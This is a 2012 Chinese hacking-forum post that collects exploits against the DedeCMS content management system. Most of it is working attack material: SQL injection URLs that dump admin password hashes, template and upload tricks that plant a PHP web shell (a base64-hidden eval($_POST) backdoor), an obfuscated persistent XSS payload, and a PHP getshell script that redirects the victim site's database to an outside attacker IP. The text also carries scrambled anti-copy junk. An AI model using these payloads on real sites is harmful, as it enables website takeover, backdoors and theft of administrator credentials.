找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3031|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 x: ~5 X+ G& u6 c7 W- _& qDedecms 5.6 rss注入漏洞7 ?: o  Z5 f0 E
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1' @; N' R1 k' G6 R0 _% `

' ^  ^0 d! }. ~. U; v" M6 X# p" S* O0 q( s7 ~
" m" \8 i. M, T$ `- z! ]

) d/ ]8 j1 w1 `3 u
7 k, {3 g2 `# S% |4 k$ H9 p8 }6 S) K" T! L( [4 B, z

  I9 M0 g( T3 s4 O( e
  A' S" w2 ~: E; Q  gDedeCms v5.6 嵌入恶意代码执行漏洞7 `& r+ ^( B" P6 i7 E
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}# W: O0 b% d$ Z$ o7 C8 Q# P, q: _) s
发表后查看或修改即可执行
9 o# i) V4 d: z, y/ h2 Ya{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}, b( L9 J+ F' g  ]- Y0 F& S8 `# s
生成x.php 密码xiao,直接生成一句话。, H5 H* h# J' b
  K+ a% q% L" l2 [6 M/ @2 ~
/ R6 ?# H) r' v  G( J* W" M5 L

4 u. b. [! ^( v2 E8 t6 M+ W  B) F
$ Z7 D3 D; W7 Y& [# x3 [: M: D# F' y2 c, d5 L
# g1 k. ?6 j7 n7 D
2 ~9 {: t! V9 w4 ]" o4 v
. H! m2 S- `" l7 Z) ?8 n4 \
Dede 5.6 GBK SQL注入漏洞
3 D& P' k( u+ F
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
* l7 `! [4 ]. L2 f9 N" n5 L8 J9 L
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe2 J0 @) \! Q3 H( r7 x0 l
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
' [7 F, g* }( @& V" V$ F, @, R6 ^7 a) D' @6 J5 g7 I

+ V7 F& ]$ m8 x
2 p$ I% ?/ h0 h6 e  }1 J, H  M- J+ ?: K% g" f
" ~3 p2 j- I" W) _  M: x

8 ~  r9 h6 V. R  _6 O4 k* I! |; ^8 p5 d
; s3 _+ Z: @. ~& r8 j
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞, \+ w/ b$ g+ r" Q' f3 _9 N
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
' C! y* {& k( x; p( U# x, v7 o3 c
5 o- A, [1 w" m: W
$ V; l1 f) E$ t$ I5 d, h* V/ d& {( h4 k: }
. ~0 s; S9 J: C
: @' e* p  S; Y

/ `( @) a' _8 cDEDECMS 全版本 gotopage变量XSS漏洞
% v$ \- A* C' `3 y0 l" _1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
) _& r7 P# C0 T; {' K
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="6 Q* E! J9 ^( p- E6 M7 R

1 k) E0 b+ F3 v% S5 g3 s
+ A6 r% T+ p) l7 f2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 ( |$ J! D7 H6 b
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda, ]' f) |, F; ^$ I: b! J4 m, p3 f

6 D- c1 Y# w( ]; L. f, \& O* V' j# T
http://v57.demo.dedecms.com/dede/login.php3 E3 N1 M- D6 T; [. i
9 ?  Z' J5 c, F5 n* b* K
# F. V' T4 l4 t. n' T, r
color=Red]DeDeCMS(织梦)变量覆盖getshell3 z! N& _: x0 y  i! F
#!usr/bin/php -w: M, w7 Y% W4 C3 m5 d$ E
<?php7 w, _( A! i4 e/ ~* f4 m6 |
error_reporting(E_ERROR);& k4 w& b, }3 O0 g6 F
set_time_limit(0);6 o- E- v0 L5 z0 g5 J
print_r('1 b5 O  Y9 C/ A; h0 @. B
DEDEcms Variable Coverage# S/ j; v1 z. {
Exploit Author:
www.heixiaozi.comwww.webvul.com0 [$ I5 W0 k+ K
);
2 V3 H. R; x. Q1 s' Iecho "\r\n";( E* k0 V; f8 `3 k' ?
if($argv[2]==null){1 G! g% G; z" s- r/ W
print_r('
! U9 f4 q# x  r& M0 h2 _1 f- K0 V+---------------------------------------------------------------------------+3 R1 s; O7 I) F7 f4 U3 J9 ]/ P
Usage: php '.$argv[0].' url aid path
& q0 ~) _, v$ h% `- c8 daid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/$ O, D# r, [- a+ F' [$ y2 g0 C1 ~3 V5 T
Example:1 E9 ]1 H( S2 ~! |$ r
php '.$argv[0].'
www.site.com 1 old
8 U! S* m# F/ a3 V) D+---------------------------------------------------------------------------+
9 U/ ?5 U* ?6 U" z0 Q) n& Q');
2 t& v+ k) n5 R  X$ Z0 X( R+ [5 w  Kexit;
& P! S' [# n' \}2 [; {" ?' h8 p) @  W6 L
$url=$argv[1];
& i9 {! P, I  n) d& Y. {  v1 v$aid=$argv[2];
0 p8 `' n4 D& s8 _* X. J$path=$argv[3];
# q9 Y5 X9 ?: B& k$exp=Getshell($url,$aid,$path);
( a+ H4 B9 B8 ]4 uif (strpos($exp,"OK")>12){: L# L; v. c9 E( ?) s2 y  y, K
echo "( z$ m  T: `) S+ f
Exploit Success \n";; n6 _' ~: d: M( K' a( f3 P& O
if($aid==1)echo "9 _- X1 ~7 q, O7 r* n
Shell:".$url."/$path/data/cache/fuck.php\n" ;
4 ?1 N4 s  f  j# q# X# C' ]
; n) u6 N2 x; N9 V, N! P/ ~# F8 ?; G# U
if($aid==2)echo "
' ^3 D1 p/ G6 {Shell:".$url."/$path/fuck.php\n" ;
  n! C' ~+ a6 u# m
+ d5 x5 i- g4 R
, L1 _$ Y' F2 _/ Jif($aid==3)echo ") _6 B$ E' C: h2 C
Shell:".$url."/$path/plus/fuck.php\n";
3 r" t: P% I8 C" z( L% k! }; O$ ?4 Y/ A$ K5 h7 p* X

  u* C  n# m3 B! f2 H}else{9 J* c1 `+ [6 Q; o/ y
echo "% m% f' O4 X* m6 g, \) D
Exploit Failed \n";' j- q% R: `; m8 o
}: p, P2 Z  m0 L5 C( D$ N
function Getshell($url,$aid,$path){. C9 |4 Q  S# U; N: R
$id=$aid;) `2 I: W& G$ D0 s( i+ E+ t
$host=$url;
  p) {0 c9 T7 ]% |/ \$ K$port="80";
1 J& g3 B  U) D/ I/ z) H2 \" g$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";) z+ d$ [7 y$ F/ M6 Q3 [  o
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";- z, o- W/ m# h9 |1 T
$data .= "Host: ".$host."\r\n";
) j1 H0 o: y  N* e! u2 T/ C* O$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";* T/ D4 q9 k& F9 y8 ~- N
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
, ~+ l% B4 W4 D! H( _$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";8 g. \% H) _- h. n& ?
//$data .= "Accept-Encoding: gzip,deflate\r\n";
: E, H$ Z+ |) x& t; c+ ]: g3 A$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
& G# y  F0 }- Z8 E$data .= "Connection: keep-alive\r\n";* u* |% T5 s* f( z0 w- ?4 W- r1 ~' Z
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
( s- A; o1 u% ^. r( }$data .= "Content-Length: ".strlen($content)."\r\n\r\n";, T7 J: E1 v- o$ t' D
$data .= $content."\r\n";
+ a! P4 O4 \7 E: G7 m2 A& r7 r  c$ock=fsockopen($host,$port);. a5 I/ x9 z3 e' l0 E
if (!$ock) {
2 |0 o8 N  a3 I' `$ \  }8 u9 Mecho ", e; q8 y4 e) d; G" e  g$ W6 n3 o
No response from ".$host."\n";6 E2 L; F+ e6 M1 g
}
1 k( l4 I# _6 p, g; rfwrite($ock,$data);
% i1 A* ^! F4 i# X; }5 B6 swhile (!feof($ock)) {
& X( t* s- X5 _' Z0 b1 \  c/ Y$exp=fgets($ock, 1024);" `* u/ D; h  @
return $exp;
, R, g8 d8 l0 _8 S6 s0 K}
; |2 E6 m- t* Z}4 I" R- a+ F, f+ ^( P6 ]4 L1 r6 q

+ O# N8 m. \' j2 e' \- S6 r3 N8 Q/ D/ @
8 U1 O$ j% L- ?: E/ B* G( z" @?>( N$ z; V# L  z' V; {
  Q' B: y( c0 A, ^
" g  \) Z& f  Y  }' V1 y5 k/ Z

% M7 f8 c% ^8 Q+ W* I, l  P1 j- ~5 Y/ w3 x8 {8 }; u
6 _: o/ G4 @+ ~7 Q8 z
6 _8 M. @) y- I! l: p- k

) S/ D4 x8 `- g6 Z5 c, j
9 R  f( N* y$ u- h: L( `/ e
% L' V7 k: j* x* k, u5 z6 q1 h% g1 f: U, }, O
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)+ O2 Z7 ]% }) s; `  k0 m9 {; H
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: W5 J5 Y9 Y4 V( g1 R" @0 A" V" l; F4 u/ j* C
1 i' m4 _2 I$ {' M/ d
把上面validate=dcug改为当前的验证码,即可直接进入网站后台: X* y9 a: u7 ]5 |& J

# x4 q1 F7 o2 W6 E+ L$ ]( J
+ c8 T5 m' _' O, ~此漏洞的前提是必须得到后台路径才能实现$ k! K0 |' |6 S+ }* @

; O9 Z/ b8 x2 H/ P
! @1 j' K/ g4 r6 O
; i+ o) o/ j+ g$ \* |
# M9 j" `) s* f' i3 R# l( h  R7 U+ M+ A

7 R: x. T' d5 G7 G. R6 q# e* T; ~9 f! c" q

! Q% K/ y3 t6 M/ ?) u; h' `. J* Z8 v: O, ~# I5 \
+ c% S+ h! p% K. W+ P
Dedecms织梦 标签远程文件写入漏洞
% Z/ u  J7 X; Z" U前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
7 p+ S( @) ~/ t
- G1 x; r' z. p8 {: I
4 |0 ~' F) s0 R; Q再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
* g  b7 T: b/ f5 Y9 q3 x<form action="" method="post" name="QuickSearch" id="QuickSearch">
) l% \% h( o1 K2 [9 b2 t$ O<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />& i$ G- n4 C2 C
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
' h, M% |% S( y' m<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />/ V8 |0 I. q' i* T  m9 }7 I. R
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
+ t$ d% U) p& U& \  R) H<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />: F7 p: p. I. I2 m
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />3 m2 G  u: k1 i/ G0 W" n
<input type="text" value="true" name="nocache" style="width:400">1 v& Q; ]4 W: o  f$ b
<input type="submit" value="提交" name="QuickSearchBtn"><br />
' \5 a" }2 h( K+ n7 Z0 h7 j</form># P7 ]' u& M8 ^
<script>6 K( a6 s" G, X& Y: |# f, Q& g
function addaction()0 o' G$ d4 K7 Y3 _5 n: ~' L& C
{
$ V: N) N' \$ ~* J! @document.QuickSearch.action=document.QuickSearch.doaction.value;
" a3 R4 t( [  D- M& l$ q2 e}* k( z# a" _/ V, j3 \9 l
</script>
5 B1 j  P2 [/ l' N: A- @4 T& D
  y" R; f( Q; R8 J# K7 x) O0 @; u0 d* M8 X0 Z0 a. c
2 e0 b* J5 ]" M% k2 R( |6 X
, M" m. }. o0 l) v- l
: h, x( w3 Y9 U  Y0 b7 E0 c
8 c4 c0 p/ Y  y
; d" K, A; f: K7 f; S! f, p2 P
7 C. v) b+ Y0 o7 E( F

; q/ D4 h$ A' `- U6 X) c9 x& L& U. _/ k/ Y, k
DedeCms v5.6 嵌入恶意代码执行漏洞
' t: H- j1 k, E* G注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
* d& z' D+ i6 I; ra{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}; @' k) K6 n* R0 p
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得( Z. \. @0 s3 h: t# s" |) [/ h3 s
Dedecms <= V5.6 Final模板执行漏洞6 {) b5 \5 {. Z* _3 O8 B/ D$ N% G
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:! Y/ f6 @9 l* F$ h5 a& u& p1 [& G# V% Z
uploads/userup/2/12OMX04-15A.jpg: ]' U: @& M" x+ V- q! H

1 q/ {6 R, Q4 ^5 L
! h. z; A. N* ]& z) B# M. ~# ]模板内容是(如果限制图片格式,加gif89a):* L" P4 W7 u- n) E9 c$ D
{dede:name runphp='yes'}. n, r/ w; U6 e& ^( |
$fp = @fopen("1.php", 'a');3 s; u- ^* O. f% }4 H2 R
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
5 _+ @# [/ _% J" \% e- d@fclose($fp);5 n+ x* r7 u# \4 z% j6 f: Y- Q1 E
{/dede:name}
7 P; P! {4 V- x  q* I! O3 y2 修改刚刚发表的文章,查看源文件,构造一个表单:
. F" U' B4 Y/ F0 n& J<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
3 ]# {9 Q7 S6 r# n. w<input type="hidden" name="dopost" value="save" />
" r9 Z1 f: f  B* I, [: T<input type="hidden" name="aid" value="2" />( e3 O- c! \8 ]' G% o! b
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
% S# H, [1 z0 T3 K! d  o" J<input type="hidden" name="channelid" value="1" />! A# ]- {' \' G9 {. O6 g0 \+ d' `
<input type="hidden" name="oldlitpic" value="" />
+ _3 u; w. B/ ^7 R. j) w5 z% c, C! I<input type="hidden" name="sortrank" value="1275972263" />, r. N1 Q% E' e, [9 ]# T: P0 L6 ]
! r8 c6 z8 ~2 d8 u* L8 D

& g: }$ [9 Z+ q7 L" g4 D2 a<div id="mainCp">
) Y4 C0 E4 P$ [) H6 a' F<h3 class="meTitle"><strong>修改文章</strong></h3>
" A2 `% s% L4 ^0 I' e- t2 I9 ]: h
7 B5 Q1 V( m4 g8 k, j& R% k
<div class="postForm">: j# F8 d+ a1 ^* l* u
<label>标题:</label>
  m; z9 z' s9 g; X0 A" @& U6 l7 d- j<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>) p* Q3 y0 [2 W0 h% N1 J

8 M: F# i& g, B7 w' [/ z8 ~- w0 I; }) S; [2 y, P1 }
<label>标签TAG:</label>
6 a+ y: {3 u0 [: c8 w. Q<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)8 O9 N1 Y: L! ^
. X4 F! ~" L2 c: B9 Z

! t% I* Q- w8 F9 L! V8 ]<label>作者:</label>
" S+ A. b9 m$ F5 Y<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>( l( C% {+ Q) e2 N
0 h: b8 b( x1 Q

9 {; A! }( V0 s; X: B3 O$ h7 L<label>隶属栏目:</label>+ N/ x: H9 t* j# L4 k
<select name='typeid' size='1'>8 p$ X# ?  L/ j2 ?  y
<option value='1' class='option3' selected=''>测试栏目</option>
& _3 _" O" c4 L9 ]6 a0 n5 D: r</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
% _/ [+ R7 I6 x% W, W) x6 l' t, i; u" h
5 Z' ?6 L' E6 D  n6 t9 v1 W% i
<label>我的分类:</label>
  N9 h5 F" Z# G" D; a2 S) J" d0 H3 |<select name='mtypesid' size='1'>' B3 t' Y$ K5 T' u$ Z# i
<option value='0' selected>请选择分类...</option>7 a8 b  V( r( f% ~
<option value='1' class='option3' selected>hahahha</option># V- w$ m% Z7 i, Q
</select>
1 g8 T4 K2 w, v/ f
$ d, F9 B8 t8 Y& c' n4 ]: H! t' v6 Y. c
<label>信息摘要:</label>
7 D0 V9 B1 K; y$ [/ `<textarea name="description" id="description">1111111</textarea>
( f7 `; X* E2 O(内容的简要说明)' g3 j* C4 P, c) _
/ V' i3 `  q8 m3 |8 Q! v; R
% @( H) B8 G8 B2 X+ i$ J: o/ M
<label>缩略图:</label>
! f- e/ {$ x( j  I$ Q* j3 i<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>* ^  M0 M3 r$ ~, w& X

, r2 g, Z) V$ l9 ?1 P$ k# T8 v+ o  P
<input type='text' name='templet'1 i/ {1 X' `( L4 N- g4 a: b
value="../ uploads/userup/2/12OMX04-15A.jpg">6 k  r: p0 d, p; F9 ?
<input type='text' name='dede_addonfields'
1 m$ K( i; d9 m) B6 K5 Avalue="templet,htmltext;">(这里构造)
" f. y* d# X$ u: o/ ^0 P</div>0 h' K; V% E" I8 O# z: M
  ~7 d( T3 z3 u

# w- n5 H: U% f<!-- 表单操作区域 -->
4 @0 P# o4 Y0 q& {# \/ t1 _<h3 class="meTitle">详细内容</h3>' W  j* j, u/ j  g9 B
- U+ }1 E" J" F; r" i: e% k* D
) H& v! R& q  T5 i- z& x! t/ ^5 f0 x
<div class="contentShow postForm">$ n. B1 M/ C8 w, n- G- h2 q1 T
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
( t& Q2 U1 ]9 o$ \- \5 ^" D5 ^: \. q$ Z# u6 t- r3 U& o

' ]2 b( F6 d- h; Q<label>验证码:</label>
/ ?5 t/ [( m5 B% @$ J% k" S<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />4 e) e, c( W  Z3 j5 O& _
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
! G+ t3 A4 q' Z5 r4 [
& _$ U( ^: Q& W+ U7 r4 ~' H8 e8 N- I  s4 N% B- x5 X
<button class="button2" type="submit">提交</button>
& C- Y6 `; j7 C; r<button class="button2 ml10" type="reset">重置</button>5 U& z  s7 m4 ~
</div>+ ~4 o) n, d+ ?/ e/ X

. c7 f& O8 n" }+ ?. Z' C5 y: W5 ~/ }6 Y1 d4 D- B2 ?
</div>2 i' ?3 _) y3 H3 c3 P; \
5 B  t: ]: M- m6 f1 R& ^

! O' T# ?* f1 c! P</form>
$ S% h( S4 \2 ?9 k- z( h& a- m8 Q  J1 `) N! p) k; m+ P' `6 m
9 _' }4 w/ Q0 c
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
. q( @5 j; e" S( c& q% g: p$ ?& q假设刚刚修改的文章的aid为2,则我们只需要访问:% D! v) [. u6 f2 t# H  c  \
http://127.0.0.1/dede/plus/view.php?aid=2
3 }$ s( J, N( z( w$ p8 |/ C% R即可以在plus目录下生成webshell:1.php* n+ W& a: b% g9 a; G, \

8 K6 s' }+ V1 ~& t+ E3 P- s4 U! n" p8 \8 w7 d
0 y) [7 @! e. A! V' x' v0 F4 O1 W
6 e3 i3 z5 A# D
0 _2 [0 O2 \; n/ i* W* e2 G

0 O$ j5 r9 o- K6 C& a! P2 a3 ^- X6 a% P5 Z2 t

) O7 a9 [9 W; _  w2 _/ w* {0 x9 @7 t, n/ |- v- Y" V

3 N0 V( D! [( L3 z5 `( N% N+ K) `. g" Y3 M( B4 y
% x/ i6 ^, I8 ~: ]) K. {
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6). A9 K; G. P! ?  Z, x. t
Gif89a{dede:field name='toby57' runphp='yes'}6 E% x/ S& j3 @+ M- i, g
phpinfo();  a2 j' z$ F2 w: x% w
{/dede:field}8 w1 K5 H3 I# i" {1 T# M" p
保存为1.gif! u5 h; f( j/ ?( {: j
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
' A* D- d' Q1 P* X8 H" f% n<input type="hidden" name="aid" value="7" />
! v, _+ v# G8 O7 t  w8 N<input type="hidden" name="mediatype" value="1" />
. A* i6 V/ r9 T8 P! L" ~! J5 g! a<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
0 F' _9 S1 z/ o; i5 L$ |<input type="hidden" name="dopost" value="save" />
; `, X5 Y$ D) _* f1 Z+ ?<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
; y! j( @  t3 d( i<input name="addonfile" type="file" id="addonfile"/>   Q) n6 B. N) Z3 b+ e2 _! B
<button class="button2" type="submit" >更改</button> " p8 ^, l" B& t# b
</form>
( |; @; {$ }2 L) I" b" V
& U* x$ f8 ^* v0 P( b7 S2 O( g
  w9 r$ _, D9 z构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
7 {- j8 j( E* ^4 G" a  g发表文章,然后构造修改表单如下:3 @* n+ L8 W4 T7 G6 N

# X: b7 {7 s) s; U  ?
$ ^4 L! N2 o- ~9 ?5 e% \* N1 P<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ) Y0 u; u9 ^, i" s5 Y% {4 n7 o
<input type="hidden" name="dopost" value="save" /> $ X5 X" T" h2 G. D8 p! B* i
<input type="hidden" name="aid" value="2" /> ) D  e8 F2 V( t) j  |7 J" p
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
9 J" g; P+ `1 B  g: |<input type="hidden" name="channelid" value="1" />
  k: U, o1 U4 c# I5 \* H<input type="hidden" name="oldlitpic" value="" /> 1 p/ a! |5 s6 C6 C* \
<input type="hidden" name="sortrank" value="1282049150" />
+ K% j# O( m+ m) I& h2 g. C$ F<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
# n; J3 W- Q5 b, F) s- y<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> # j# ?8 B) R* B6 O% g1 _2 Q) a
<select name='typeid' size='1'> 9 H2 v( A3 z6 ?0 ^
<option value='1' class='option3' selected=''>Test</option>
  v. w( s' Z  D+ {, `<select name='mtypesid' size='1'>
' ?. q! W* j! b; a. g- V: |<option value='0' selected>请选择分类...</option> ( v5 |/ m" Z% P2 F7 L0 E+ {: K
<option value='1' class='option3' selected>aa</option></select>
9 I4 l) g& v( r<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> $ `4 P5 y. M0 F& U& H. k
<input type='hidden' name='dede_addonfields' value="templet"> & K  Z2 Y2 |$ y) m: Y- |3 N6 [6 |  `
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
$ b3 A7 z8 G! D6 o- v/ `<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> / a! I& b7 z& Q/ G9 q$ ~
<button class="button2" type="submit">提交</button>
( H. b2 ^/ N9 g5 W</form>1 X! J1 q1 u& F1 }5 ?* |$ |

" v% `" c- H6 c. {- M; H" J, Z! N5 n2 @  p5 a

& f0 x4 k& s, I' _( X1 s3 y& {5 [( l+ |( X
; x4 n& W) K; P$ y) J+ i3 r

% k: X6 H* ?8 N0 G& C) \9 \# d' u2 C# A% r
- |# n: N" W& @7 m
  ~0 G+ }7 d, b
/ K! x. s& z, D2 u+ C# L5 i) Z7 s$ ]8 {

! ^% I8 Y; L4 \( X6 s8 v+ ]' [* L. S7 E
织梦(Dedecms)V5.6 远程文件删除漏洞; T# P' G  G& R
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif3 K' L% m+ M, L9 C; n) K6 V; }- G
$ \3 A* c. j, p& t
5 }6 Y1 W# y2 e

; W; J- [' z& l9 Q2 v. V( ?  z
5 X2 \4 C; e/ D" v' r# i
( t& I  e, C+ C$ \6 C1 m
( ~9 f& ?) Z4 }6 I" r$ L! W( l9 Z$ s2 X3 L: k
8 G/ \" J: T+ n. j% c4 L- z4 _* A
2 [( r; x0 e1 X6 m& q

2 u+ r& A" K7 g: r织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 $ W9 T, n( _" D1 @
http://www.test.com/plus/carbuya ... urn&code=../../( x  l! ~* ]( t3 S5 N

# T5 x8 Y4 v, a. |: s( `. L6 Z! }! r' _6 h. o
7 j0 p. z% S: x
1 ?  P9 D+ ^9 X" H

6 D/ |7 b: l, i; U" z! U/ u5 V3 L. j* t% t7 C
" K. d" q1 g2 t( T+ ^$ b- H4 t
7 }7 s6 o% r' v2 t1 y0 y
0 t) D2 [% `& n+ o
* n8 r9 }- D1 l, {
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
  j7 p9 o% L, ^/ ~* R0 Pplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`  }* G% y' Z6 A( d+ D0 D" X2 B4 m/ E
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5+ t9 \- @0 s0 A! ~+ o

# Y" x; b# j4 u, M: d, }$ P0 @3 n& @7 }
' C( K4 r; x  w) ]" A

! Q7 G9 X2 A) O/ l# q& g& L; x1 M& h+ j! e3 l; z

6 [" Q+ g9 Q$ t/ R
" H9 j  S/ N( ~6 o2 }& \- a* @" ?  Q( W+ n) q9 ~

1 m1 Q- |- c" c5 H7 z9 z3 L3 W2 {( L- g) C
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
4 \0 H  b+ N$ w* V1 S' u* a0 |http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='2 ^" i% q' v( I4 e8 i
2 V1 w2 [. R/ |0 W8 J8 B

% `3 [4 v, Y$ g
* o- c0 u; F$ \" @7 j0 v
! A+ K7 S4 N0 {$ E( n- K/ L3 d; d7 n. {# ?

